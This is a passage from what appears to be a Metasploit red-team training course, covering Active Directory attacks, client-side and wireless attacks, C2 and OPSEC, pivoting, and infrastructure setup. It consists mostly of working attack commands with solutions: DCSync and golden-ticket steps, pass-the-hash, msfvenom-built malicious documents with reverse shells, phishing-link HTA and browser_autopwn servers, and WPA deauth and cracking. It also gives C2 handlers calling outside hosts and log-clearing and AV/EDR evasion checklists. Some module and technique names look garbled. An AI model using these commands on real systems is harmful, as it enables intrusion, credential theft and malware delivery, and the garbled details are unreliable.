ticket\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. LDAP enumeration\nmsf6 > use auxiliary/admin/ldap/query\nmsf6 auxiliary(admin/ldap/query) > set RHOSTS DC01.corp.local\nmsf6 auxiliary(admin/ldap/query) > set BASE_DN \"DC=corp,DC=local\"\nmsf6 auxiliary(admin/ldap/query) > set USERNAME CORP\\\\pentester\nmsf6 auxiliary(admin/ldap/query) > set PASSWORD P@ssw0rd123\nmsf6 auxiliary(admin/ldap/query) > set FILTER \"(objectClass=user)\"\nmsf6 auxiliary(admin/ldap/query) > run\n\n# Output: Lists all domain users with their SPNs\n\n# 2. Find SPN accounts\n# From meterpreter on domain-joined host:\nmeterpreter > powershell_execute \"Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\"\n\n# Output:\n# samaccountname serviceprincipalname\n# svc_sql MSSQLSvc/sql01.corp.local\n# svc_backup MSSQLSvc/sql02.corp.local\n\n# 3. Hashdump on DC or any domain admin accessible host\nmeterpreter > hashdump\n# OR from msfconsole with DA access:\nmsf6 > run post/windows/gather/hashdump\n# Output: All domain hashes\n\n# 4. Pass-the-Hash lateral movement\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.20 # second DC\nmsf6 exploit(windows/smb/psexec) > set SMBUser Administrator\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# 5. DCSync with Domain Admin\nmeterpreter > load kiwi\nmeterpreter > dcsync_ntlm CORP.LOCAL\\\\krbtgt\n# Extracts krbtgt hash and domain SID\n\n# 6. Golden ticket\nmeterpreter > golden_ticket_create -d CORP.LOCAL \\\n -k \\\n -s \\\n -u Administrator \\\n -t /tmp/golden_ticket.kirbi\n\n# Verify with:\nmeterpreter > kerberos_ticket_use /tmp/golden_ticket.kirbi\n```\n\n\n\n---\n\n## Lesson 29: Social Engineering & Client-Side Attacks\n\n### Learning Objectives\n- Use MSF's client-side attack modules\n- Generate malicious documents (DOC, PDF) with embedded payloads\n- Set up an SMB relay for credential harvesting\n- Use the `browser_autocomplete` and `browser_jwe` modules\n- Understand client-side attack methodology\n\n---\n\n### Theory/Explanation\n\n#### Client-Side Attack Philosophy\n\nInstead of attacking a server directly, you attack the CLIENT (the user's workstation). You make the user connect to your malicious server or open a malicious file. When they do, you get code execution on their machine.\n\n**Common scenarios:**\n- Malicious link sent via email \u2192 user opens in browser \u2192 meterpreter\n- Malicious PDF via email \u2192 user opens \u2192 meterpreter\n- Malicious DOC via email \u2192 user enables macros \u2192 meterpreter\n- Rogue SMB server \u2192 user accesses shared folder \u2192 hash capture\n\n#### Malicious Document Generation\n\n```bash\n# Generate malicious RTF document\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f rtf \\\n -o malicious.rtf\n\n# Generate malicious PDF\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f pdf \\\n -o malicious.pdf\n\n# Generate malicious DOCX (VBA macro)\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f docx \\\n -o malicious.docx\n\n# Generate macro-enabled XLS\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f psh VBA \\\n -o macro.vba\n# Then embed in Excel via manual process\n```\n\n#### The `msfconsole` HTA Attack\n\n```bash\n# Host an HTA exploit via msfconsole\nmsf6 > use exploit/windows/misc/hta_server\nmsf6 exploit(windows/misc/hta_server) > set SRVHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/misc/hta_server) > set LHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > exploit -j\n# Generates: http://10.0.0.5:8080/abc123.hta\n\n# Send this link to target user\n# When they open it in IE/Edge, meterpreter fires\n```\n\n#### SMB Relay Attack\n\n```bash\n# Use Responder + MSF SMB relay\n# 1. Start Responder to poison LLMNR/NBT-NS\nresponder -I eth0 -b On\n\n# 2. When a user tries to access a share and fails,\n# responder captures their NTLM hash\n\n# 3. Relay captured hash to another target\nmsf6 > use auxiliary/server/relay_local\n# This relays hashes to targets you specify\n```\n\n#### Browser Exploitation\n\n```bash\n# Use browser_autopwn (automatic browser exploitation)\nmsf6 > use auxiliary/server/browser_autopwn\nmsf6 auxiliary(server/browser_autopwn) > set SRVHOST 10.0.0.5\nmsf6 auxiliary(server/browser_autopwn) > set URIPATH /\nmsf6 auxiliary(server/browser_autopwn) > run -j\n# Generates multiple exploit URLs for different browsers\n# When target visits, auto-exploits with best available exploit\n```\n\n---\n\n### Exercise 29.1\n\n**Task**:\n\n1. Set up an HTA server exploit in msfconsole\n2. Generate a malicious RTF document for Word\n3. Generate a macro-enabled VBA script\n4. Set up a browser_autopwn server\n5. For each: explain the attack flow and what the user needs to do\n\n```bash\n# TODO: Execute and explain\n```\n\n\n\nSolution\n\n```bash\n# 1. HTA Server (most reliable client-side)\nmsf6 > use exploit/windows/misc/hta_server\nmsf6 exploit(windows/misc/hta_server) > set SRVHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/misc/hta_server) > set LHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > exploit -j\n[*] URL: http://10.0.0.5:8080/PNgfvJhP.hta\n\n# Attack flow:\n# 1. Attacker sends link: http://10.0.0.5:8080/PNgfvJhP.hta\n# 2. User opens link in IE/Edge\n# 3. HTA file downloads and executes (with user confirmation)\n# 4. Meterpreter fires \u2014 no macro needed, no file to open\n\n# 2. Malicious RTF\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f rtf \\\n -o malicious.rtf\n\n# Attack flow:\n# 1. Attacker sends RTF via email\n# 2. User opens RTF in Word\n# 3. RTF exploits CVE-XXXX (old Word vulnerability)\n# 4. Meterpreter fires\n\n# 3. Macro VBA\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f psh VBA \\\n -o macro.vba\n\n# Attack flow:\n# 1. Attacker sends DOCM with macro.vba embedded\n# 2. User opens document, sees \"Enable Content\" prompt\n# 3. User clicks Enable Content\n# 4. Macro executes: downloads meterpreter and runs it\n# 5. Meterpreter fires\n\n# 4. Browser Autopwn\nmsf6 > use auxiliary/server/browser_autopwn\nmsf6 auxiliary(server/browser_autopwn) > set SRVHOST 10.0.0.5\nmsf6 auxiliary(server/browser_autopwn) > set URIPATH /\nmsf6 auxiliary(server/browser_autopwn) > run -j\n[*] Starting exploit generator...\n[*] Browsers supported: [mshtml, chromefox, firefox]\n[*] URL: http://10.0.0.5:8080/\n\n# Attack flow:\n# 1. Attacker sends link: http://10.0.0.5:8080/\n# 2. User opens link in any browser\n# 3. Autopwn tests each browser and exploits the best available\n# 4. Meterpreter fires on first successful exploit\n```\n\n\n\n---\n\n## Lesson 30: Wireless Attacks & Radio Frequency Exploitation\n\n### Learning Objectives\n- Use `aircrack-ng` suite for wireless reconnaissance\n- Use `hostapd-wpe` for WPA enterprise attacks\n- Understand the MSF wireless modules\n- Perform wireless network enumeration\n- Capture and crack WPA handshakes\n\n---\n\n### Theory/Explanation\n\n#### MSF Wireless Modules\n\nMSF has limited wireless capabilities \u2014 primarily for reporting and data management:\n\n```bash\n# These modules primarily manage data from wireless reconnaissance\n# not active wireless attacks\n\n# Import and manage wireless data\nmsf6 > use auxiliary/client/socket/reverse_tcp\n# This is not wireless-specific\n\n# The primary wireless attack tools are external:\n# - aircrack-ng suite\n# - hostapd-wpe\n# - wifite2\n# - hcxdumptool\n```\n\n#### Wireless Recon with aircrack-ng\n\n```bash\n# Put interface in monitor mode\nairmon-ng start wlan0\n# Creates: wlan0mon\n\n# Capture traffic\nairodump-ng wlan0mon -w /tmp/capture --output-format pcap\n\n# Target a specific network\nairodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF \\\n -c 6 \\\n --essid CorpWiFi \\\n -w /tmp/corp_wifi\n\n# Deauth to force reconnection (grab handshake)\naireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c TARGET_CLIENT\n\n# Crack WPA handshake\naircrack-ng -w /usr/share/wordlists/rockyou.txt \\\n -b AA:BB:CC:DD:EE:FF /tmp/corp_wifi.cap\n```\n\n#### WPA Enterprise Attacks\n\n```bash\n# Set up rogue AP with hostapd-wpe\nhostapd-wpe /etc/hostapd-wpe.conf\n\n# Configuration example:\n# interface=wlan0mon\n# ssid=CorpWiFi\n# driver=nl80211\n# ieee8021x=1\n# eap_server=1\n# eap_user_file=/etc/hostapd-wpe.eap_user\n# Credentials captured when user connects to your fake AP\n```\n\n#### MSF Integration with Wireless\n\n```bash\n# After capturing handshake, import into MSF for management\n# MSF doesn't crack WPA \u2014 use hashcat or aircrack-ng\n\n# Store wireless data in MSF database\n# (after using airodump-xml2sql or similar import)\n\n# Use MSFCREDENTIAL to store cracked passwords\nmsf6 > creds add user:admin hash:5f4dcc3b5aa765d61d8327deb882cf99\n```\n\n---\n\n### Exercise 30.1\n\n**Task**:\n\n1. List all wireless interfaces and put one in monitor mode\n2. Run airodump-ng to discover nearby networks\n3. Target a specific network and capture a handshake\n4. Crack the handshake using hashcat\n5. Store the cracked credentials in the MSF database\n\n```bash\n# TODO: Execute wireless attack steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Monitor mode\niwconfig # list interfaces\nairmon-ng start wlan0\n# or: ip link set wlan0 down && iw dev wlan0 set monitor mode && ip link set wlan0 up\n\n# 2. Discover networks\nairodump-ng wlan0mon\n# Output:\n# CH 6 SSID BSSID ENCRYPTION AUTH\n# 6 CorpWiFi AA:BB:CC:DD:EE:FF WPA2 PSK\n# 6 GuestWiFi 11:22:33:44:55:66 WPA2 PSK\n\n# 3. Target and capture handshake\nairodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/corp --output-format pcap\n\n# In another terminal, deauth to force reconnection:\naireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA\n\n# Wait for handshake in airodump output:\n# [WPA handshake: AA:BB:CC:DD:EE:FF]\n\n# 4. Crack with hashcat\n# Convert to hccapx format\n# Using hashcat tools:\n# ./cap2hccapx.bin /tmp/corp-01.cap /tmp/corp.hccapx\n\n# Crack:\nhashcat -m 2500 -a 0 /tmp/corp.hccapx /usr/share/wordlists/rockyou.txt\n\n# 5. Store in MSF database\nmsf6 > creds add user:admin host:192.168.1.50 service:wifi \\\n password:SuperSecret123 \\\n 'cracked_password:SuperSecret123'\n```\n\n\n\n---\n\n# Module 7: Red Team Operations with Metasploit\n\n---\n\n## Lesson 31: Red Team vs Penetration Testing\n\n### Learning Objectives\n- Understand the difference between penetration testing and red team operations\n- Plan a red team engagement: scope, objectives, rules of engagement\n- Use C2 frameworks alongside MSF for advanced operations\n- Understand operational security (OPSEC) during engagements\n- Coordinate red team with blue team (threat emulation)\n\n---\n\n### Theory/Explanation\n\n#### Penetration Testing vs Red Team\n\n| Aspect | Penetration Test | Red Team |\n|--------|-----------------|----------|\n| **Goal** | Find vulnerabilities | Achieve objectives (data breach, domain dominance) |\n| **Scope** | Specific systems/networks | Full organization (physical, social, technical) |\n| **Duration** | Days to weeks | Weeks to months |\n| **Phases** | Quick, thorough scanning | Slow, stealthy, persistent |\n| **Success** | Findings count | Objective achieved |\n| **Stealth** | Moderate | Critical |\n\n#### Red Team Engagement Planning\n\n```bash\n# Rules of Engagement Document\n# ============================\n# Scope: All corporate systems at 192.168.1.0/24 and 10.10.10.0/24\n# Objectives:\n# 1. Obtain Domain Admin\n# 2. Access financial systems\n# 3. Exfiltrate sample data (simulated)\n# Rules:\n# - No denial of service\n# - No physical access\n# - Weekly status reports\n# - Immediate notification of DBAN access\n# - Engagement duration: 30 days\n```\n\n#### C2 Frameworks\n\nC2 (Command and Control) frameworks extend MSF capabilities for long-term operations:\n\n| Framework | Language | Notes |\n|-----------|---------|-------|\n| **Covenant** | C# (.NET) | Cross-platform, pivoting, rich UI |\n| **Cobalt Strike** | Java | Commercial, best-in-class, Beacon payload |\n| **Sliver** | Go | Open-source, cross-platform, advanced EDR evasion |\n| **Mythic** | Python | Modern, containerized, browser scriptable |\n| **Koadic** | Python | JScript/VBS COM-based, Windows focus |\n\n#### OPSEC Principles\n\nOperational Security (OPSEC) keeps your operation undetected:\n\n```\nOPSEC Rules for Red Team:\n========================\n1. Callbacks to same IP/port = pattern\n Fix: Rotate LHOST, use domain fronting, CDN redirects\n\n2. Repeated exploitation = detection\n Fix: Use legitimate credentials, living-off-the-land (LotL)\n\n3. Large payloads in memory = AV triggering\n Fix: Small stagers, AMSI bypass, segmented execution\n\n4. Scheduled callbacks = network anomaly\n Fix: Randomize intervals, use domain-relative timing\n\n5. Standard payload paths = file-based detection\n Fix: In-memory execution, Schrang (process hollowing)\n```\n\n#### MSF in Red Team Engagements\n\n```bash\n# MSF is typically used for:\n# 1. Initial access (when C2 is not yet deployed)\n# 2. Quick assessment scanning\n# 3. Credential harvesting\n# 4. Lateral movement when C2 is detected/banned\n\n# Cobalt Strike + MSF workflow:\n# 1. MSF: Initial scan and exploitation\n# 2. MSF: Get first beacon on target\n# 3. Cobalt Strike: Install C2, pivot through network\n# 4. MSF: For targets that block/beacon detected\n\n# Using Metasploit as a C2:\nmsf6 > use exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST dailybuild.pw\nset LPORT 443\nset ExitOnSession false\nexploit -j\n\n# Domain fronting (use CDN as proxy):\n# Set ReverseListenerRedirect to true\n# Use CDN domain as LHOST (e.g., cloudfront)\n```\n\n---\n\n### Exercise 31.1\n\n**Task**: \n\n1. Create a Red Team Rules of Engagement document (in Thai and English) for a simulated engagement\n2. Define the objectives hierarchy (primary, secondary, tertiary)\n3. Create an OPSEC checklist with at least 10 items\n4. Set up a multi/handler with `reverse_https` payload (more stealthy than `reverse_tcp`)\n5. Explain how domain fronting would work in this scenario\n\n```bash\n# TODO: Create the document\n```\n\n\n\nSolution\n\n```bash\n# 1. Rules of Engagement (ROE)\ncat > /tmp/ROE.md << 'EOF'\n# RED TEAM ENGAGEMENT RULES OF ENGAGEMENT\n# Organization: Example Corp\n# Duration: 30 days\n# Classification: Confidential\n\n## OBJECTIVES\n\n### Primary\n1. Obtain Domain Admin access\n2. Access and demonstrate exfiltration of financial data\n3. Gain access to R&D systems\n\n### Secondary\n1. Establish persistent access on 5+ systems\n2. Demonstrate ability to move laterally to internal VLANs\n3. Compromise backup systems\n\n### Tertiary\n1. Access CEO workstation\n2. Demonstrate ability to access physical security systems\n\n## RULES\n\n1. NO Denial of Service attacks on production systems\n2. NO destructive data wip (wipe simulations only with approval)\n3. NO social engineering that could cause real-world harm\n4. NO targeting of personal devices outside scope\n5. All exploitation documented with timestamps\n6. Immediate escalation if exfiltration detected by blue team\n7. Weekly status reports every Monday\n8. All C2 traffic must be indistinguishable from normal HTTPS\n9. Persistence mechanisms must survive system reboots\n10. Blue team must NOT be tipped off before engagement ends\n\n## COMMUNICATION\n\n- Emergency contact: +66-xxx-xxxx\n- Signal channel: [REDACTED]\n- Engagement code word: PHOENIX\n-Abort code word: BANGKOK\nEOF\n\n# 2. Objectives hierarchy (already in ROE above)\n\n# 3. OPSEC Checklist\ncat > /tmp/OPSEC_CHECKLIST.md << 'EOF'\n# OPSEC Checklist (10+ items)\n\n## Network OPSEC\n[x] Rotate LHOST every 48 hours\n[x] Use domain fronting for C2 callbacks\n[x] Randomize callback intervals (jitter: 10-30%)\n[x] Use legitimate CDN as proxy (CloudFront, Azure CDN)\n[x] Avoid hardcoded IPs in payloads\n[x] Certificate pinning for C2 comms\n[ ] Domain reputation management (freshly registered domains)\n\n## Host OPSEC\n[x] Avoid writing files to disk when possible\n[x] Use LOLBins (Living-off-the-Land binaries) for execution\n[x] Clear event logs after exploitation\n[x] Disable PowerShell script block logging\n[x] Use process injection to blend with legitimate processes\n[x] Avoid spawning obvious malicious processes (cmd.exe + nc.exe)\n\n## Payload OPSEC\n[x] AV evasion (encoding, packing, custom stagers)\n[x] AMSI bypass before running .NET scripts\n[x] EDR userland hooking bypass (syscall direct)\n[x] Avoid API calls that trigger ETW (Event Tracing for Windows)\n[x] Sleep/jitter before executing suspicious code\n\n## Credential OPSEC\n[x] Use Kerberos tickets instead of NTLM hashes where possible\n[x] Avoid saving credentials to disk\n[x] Use DCSync carefully ( loud operation)\n[x] Golden ticket lifetime limited to 8 hours max\nEOF\n\n# 4. Multi-handler with reverse_https (stealth)\nmsfconsole -q\nmsf6 > use exploit/multi/handler\nmsf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https\nmsf6 exploit(multi/handler) > set LHOST cobalt.example.com\nmsf6 exploit(multi/handler) > set LPORT 443\nmsf6 exploit(multi/handler) > set ExitOnSession false\nmsf6 exploit(multi/handler) > set HandlerSSLCert /tmp/cert.pem\nmsf6 exploit(multi/handler) > exploit -j\n\n# 5. Domain Fronting Explanation:\n# Domain fronting works by:\n# 1. Attacker registers a legitimate CDN domain (e.g., cloudfront.com)\n# 2. Attacker sets up C2 infrastructure behind the CDN\n# 3. Victim's HTTPS request goes to CDN with SNI:attacker-domain\n# 4. CDN routes to attacker backend based on Host header\n# 5. Firewall sees: legitimate cloudfront.com -> allowed\n# 6. Actual traffic: attacker-payload, invisible to firewall\n#\n# Implementation:\n# Use CloudFront as front, redirect Host: dailybuild.pw\n# Meterpreter connects to cloudfront.com:443\n# But Host header says dailybuild.pw\n# CloudFront routes to dailybuild.pw backend\n# Traffic appears as normal HTTPS to cloudfront\n```\n\n\n\n---\n\n## Lesson 32: Pivoting, Tunneling & Covert Channels\n\n### Learning Objectives\n- Create covert tunnels through Meterpreter sessions\n- Use portfwd and SOCKS proxy for pivoting\n- Understand DNS tunneling and ICMP tunneling\n- Use ProxyChains to tunnel any tool through MSF sessions\n- Set up VPN pivoting through compromised hosts\n\n---\n\n### Theory/Explanation\n\n#### Port Forwarding (Meterpreter)\n\n```bash\n# Forward local port to remote host\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\n# Now: curl http://127.0.0.1:8080 \u2192 10.10.10.50:80 via meterpreter\n\n# Forward remote port to local\nmeterpreter > portfwd add -l 3306 -p 3306 -r 127.0.0.1\n# Now: mysql -h 127.0.0.1 \u2192 remote MySQL via meterpreter\n\n# List all forwards\nmeterpreter > portfwd\n\n# Delete forward\nmeterpreter > portfwd delete -l 8080 -p 80 -r 10.10.10.50\n\n# Flush all\nmeterpreter > portfwd flush\n```\n\n#### SOCKS Proxy for Tool Chaining\n\n```bash\n# Create SOCKS proxy server in MSF\nmsf6 > use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1\nmsf6 auxiliary(server/socks_proxy) > set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) > run -j\n\n# Configure /etc/proxychains.conf\ncat >> /etc/proxychains.conf << 'EOF'\n# Add at end:\nsocks4 127.0.0.1 1080\nEOF\n\n# Now tunnel ANY tool through MSF session:\nproxychains nmap -sT -sV 10.10.10.0/24\nproxychains ssh user@10.10.10.50\nproxychains hydra -L users.txt -P pass.txt 10.10.10.50 ssh\nproxychains firefox http://10.10.10.50 # Browse internal web\n```\n\n#### SSH Tunneling via Meterpreter\n\n```bash\n# If target has SSH access, pivot through it\nmeterpreter > shell\n$ ssh -D 1080 user@internal-ssh-server\n# Creates SOCKS proxy through SSH tunnel\n\n# Or reverse tunnel: from target to attacker\n# From meterpreter shell on target:\n$ ssh -R 8080:127.0.0.1:80 user@10.0.0.5\n# Now: attacker:8080 \u2192 target's localhost:80\n```\n\n#### VPN Pivoting (Meterpreter)\n\nMeterpreter supports VPN pivoting for full network access:\n\n```bash\n# Create VPN interface through meterpreter\nmeterpreter > run post/network/manage/vpn\n\n# Or use autoroute for full routing:\nmeterpreter > run post/multi/manage/autoroute\n# This adds routes to MSF for the entire internal network\n```\n\n#### DNS Tunneling\n\n```bash\n# DNS tunneling: encapsulate data in DNS queries\n# This works when only DNS is allowed out\n\n# Using dnscat2 (external tool):\n# On attacker:\ndnscat2-server example.com\n\n# On target (behind firewall):\ndnscat2-client --dns-server=10.0.0.5 --domain=example.com\n\n# Now you have a C2 channel over DNS\n# Commands are encoded in DNS TXT records\n```\n\n#### ICMP Tunneling\n\n```bash\n# Tunnel traffic through ICMP (ping) packets\n# Useful when only ping is allowed out\n\n# Using ptunnel-ng:\n# On attacker:\nptunnel-ng -p \n\n# On target:\nptunnel-ng -p -l -r -R \n\n# Now: target:local_port \u2192 attacker \u2192 remote_ip:remote_port\n```\n\n---\n\n### Exercise 32.1\n\n**Task**:\n\n1. Set up portfwd from your Kali machine to reach an internal web server at 10.10.10.50:80 via your meterpreter session\n2. Create a SOCKS proxy server on port 1080\n3. Configure proxychains to use the SOCKS proxy\n4. Use `proxychains nmap` to scan the internal network\n5. Demonstrate tunneling SSH through the Meterpreter session\n\n```bash\nmeterpreter > # TODO\n```\n\n\n\nSolution\n\n```bash\n# 1. Port forwarding (from meterpreter)\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\n[*] Local TCP relay: 0.0.0.0:8080 <-> 10.10.10.50:80\n\n# Now on Kali, test the forward:\ncurl http://127.0.0.1:8080\n# Should show internal web server content\n\n# 2. SOCKS proxy (from msfconsole, not meterpreter)\n# background meterpreter first\nmeterpreter > background\nmsf6 > use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1\nmsf6 auxiliary(server/socks_proxy) > set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) > run -j\n[*] Auxiliary module running as background job 1.\n[*] Starting SOCKS proxy on 127.0.0.1:1080.\n\n# 3. Configure proxychains\ncat > /tmp/proxychains.conf << 'EOF'\ndynamic_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks4 127.0.0.1 1080\nEOF\n\ncp /tmp/proxychains.conf /etc/proxychains.conf\n\n# 4. Scan internal network via proxychains\n# Add route to MSF first:\nmsf6 > route add 10.10.10.0 255.255.255.0 1\n# Now MSF routes through session 1\n\n# But proxychains goes through the SOCKS proxy:\nproxychains nmap -sT -sV -p 22,80,443 10.10.10.50\n# Output shows open ports on internal host through tunnel\n\n# 5. SSH tunnel through meterpreter\nmeterpreter > shell\n$ ssh -D 1080 -C -N user@internal-ssh-server\n# -D 1080: creates SOCKS proxy on port 1080\n# -C: compress\n# -N: don't execute remote command (just tunnel)\n\n# Now you can use the SSH tunnel as another SOCKS proxy\n# Or in proxychains.conf add:\n# socks4 127.0.0.1 1080\n```\n\n\n\n---\n\n## Lesson 33: Building Your MSF Infrastructure\n\n### Learning Objectives\n- Set up a secure Metasploit database with PostgreSQL\n- Configure MSF for high-performance scanning\n- Set up a team server for collaborative assessments\n- Configure logging and audit trails\n- Build scripts for rapid deployment\n\n---\n\n### Theory/Explanation\n\n#### Database Setup\n\n```bash\n# PostgreSQL setup for MSF\nsudo apt update && sudo apt install postgresql\n\n# Create MSF database user\nsudo -u postgres createuser msf -P\n# Enter password: your_secure_password\n\n# Create database\nsudo -u postgres createdb -O msf msfdb\n\n# Initialize\nmsfdb init\n\n# Configure MSF to use external database\n# Edit: ~/.msf4/database.yml\ncat > ~/.msf4/database.yml << 'EOF'\nproduction:\n adapter: postgresql\n database: msfdb\n username: msf\n password: your_secure_password\n host: 127.0.0.1\n port: 5432\n pool: 5\n timeout: 5\nEOF\n\n# Connect\nmsfconsole -q\nmsf6 > db_status\n[*] postgresql connected to msfdb\n```\n\n#### High-Performance Configuration\n\n```bash\n# ~/.msf4/msf4.yml\n# Tune performance for large assessments\ncat > ~/.msf4/msf4.yml << 'EOF'\n# Performance\nperformance:\n thread_limit: 20\n nmap_max_parallel_sockets: 10\n mass_assessment_max: 500\n\n# Database\ndb:\n mass_assessment_import: true\n auto_collapse_note_types:\n - vulnerability\n - vuln\n - cve\n\n# Logging\nlogging:\n level: verbose\n api_log: /var/log/msf/api.log\nEOF\n```\n\n#### Team Server Setup\n\n```bash\n# For collaborative assessments, use MSF RPC daemon\n# Start msfrpcd\nmsfdb stop\nmsfrpcd -U team -P team_password -S -f\n\n# Now team members can connect:\nmsfconsole --rpc\n# Or connect via msfrpc client in Python:\n# from metasploit.msf import MsfRpcClient\n# client = MsfRpcClient('team_password', port=55553)\n```\n\n#### Logging and Audit\n\n```bash\n# Enable detailed logging\n# In msfconsole:\nmsf6 > set Global verbose\n\n# Set log directory\nmsf6 > set LogLevel 3\n\n# Save all output to file\nmsf6 > makerc /tmp/assessment.rc\n\n# Export complete database\nmsf6 > db_export -f xml /tmp/assessment_data.xml\nmsf6 > db_export -f pwdump /tmp/assessment_hashes.txt\n\n# Store loot in organized directory\nmkdir -p /tmp/loot/{hosts,services,credentials,screenshots}\n```\n\n---\n\n### Exercise 33.1\n\n**Task**:\n\n1. Configure PostgreSQL database for MSF\n2. Create a workspace for your assessment\n3. Import an Nmap scan XML result\n4. Set up a high-performance configuration\n5. Create a resource script that initializes everything in one command\n6. Configure log rotation for MSF logs\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Configure PostgreSQL\nsudo systemctl start postgresql\nsudo systemctl enable postgresql\nsudo -u postgres createuser msf -P\nsudo -u postgres createdb -O msf msfdb\n\n# 2. Create database.yml\nmkdir -p ~/.msf4\ncat > ~/.msf4/database.yml << 'EOF'\nproduction:\n adapter: postgresql\n database: msfdb\n username: msf\n password: msf_secure_password_2024\n host: 127.0.0.1\n port: 5432\n pool: 5\n timeout: 5\nEOF\n\n# 3. Create workspace\nmsfconsole -q\nmsf6 > workspace -a RedTeamAssessment\nmsf6 > workspace RedTeamAssessment\n\n# 4. Import Nmap scan\nmsf6 > db_import /tmp/nmap_scan.xml\nmsf6 > hosts\nmsf6 > services\n\n# 5. High-performance config\ncat > ~/.msf4/msf4.yml << 'EOF'\nperformance:\n thread_limit: 20\n mass_assessment_max: 1000\ndb:\n mass_assessment_import: true\nlogging:\n level: verbose\nEOF\n\n# 6. Setup resource script\ncat > /tmp/msf_setup.rc << 'EOF'\n# Initialize MSF for assessment\nworkspace -a RedTeamAssessment\nsetg THREADS 20\nsetg VERBOSE true\n\n# High performance DB\ndb_import /tmp/nmap_scan.xml\n\n# Configure SOCKS for pivoting\nuse auxiliary/server/socks_proxy\nset SRVHOST 127.0.0.1\nset SRVPORT 1080\nrun -j\n\n# Set up handler\nuse exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST dailybuild.pw\nset LPORT 443\nset ExitOnSession false\nexploit -j\n\n# Show initial status\nhosts\nservices\njobs\nEOF\n\n# Run: msfconsole -q -r /tmp/msf_setup.rc\n\n# 7. Log rotation\n# Add to /etc/logrotate.d/metasploit\nsudo cat > /etc/logrotate.d/metasploit << 'EOF'\n/var/log/msf/*.log {\n daily\n rotate 7\n compress\n delaycompress\n notifempty\n create 0640 root root\n}\nEOF\n```\n\n\n\n---\n\n# Module 8: Capstone Projects\n\n---\n\n## Capstone 1: Full Penetration Test with Complete Attack Chain\n\n### Scenario Overview\n\n**Objective:** Perform a complete penetration test against a target organization called `SecureCorp Ltd.` Your objective is to achieve Domain Admin within the internal network.\n\n**Scope:**\n- External: 203.0.113.0/24 (single public IP: 203.0.113.50)\n- Internal: 192.168.1.0/24 (Windows AD environment)\n- DMZ: 192.168.1.50 (public-facing web server)\n- Internal: 192.168.1.0/24 (full AD domain: securecorp.local)\n- Domain Controllers: 192.168.1.10 (DC01), 192.168.1.11 (DC02)\n\n**Rules:**\n- No DoS attacks\n- Document all findings\n- Immediate stop if ransomware or destructive actions are triggered\n- All exploitation via MSF unless specified otherwise\n\n### Phase 1: External Reconnaissance\n\n**Step 1.1: Initial Port Scan**\n\n```bash\n# Start MSF with database\nmsfconsole -q\nmsf6 > db_nmap -sT -sV -sC -O -p 1-10000 -oA /tmp/external_scan 203.0.113.50\n\n# Results show:\n# PORT STATE SERVICE VERSION\n# 22 open ssh OpenSSH 8.4 (Ubuntu)\n# 80 open http Apache 2.4.41\n# 443 open https Apache 2.4.41\n# 3306 open mysql MySQL 8.0.23\n# 8080 open http Apache Tomcat 9.0.43\n```\n\n**Step 1.2: Web Enumeration**\n\n```bash\n# Directory scan\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n\n# Results:\n# /admin (Tomcat manager)\n# /phpmyadmin\n# /backup\n# /api\n\n# Nikto web scan\nmsf6 > use auxiliary/scanner/http/cert\nmsf6 auxiliary(scanner/http/cert) > set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/cert) > run\n```\n\n**Step 1.3: Tomcat Exploitation**\n\n```bash\n# Tomcat manager brute force\nmsf6 > use auxiliary/scanner/http/tomcat_mgr_login\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 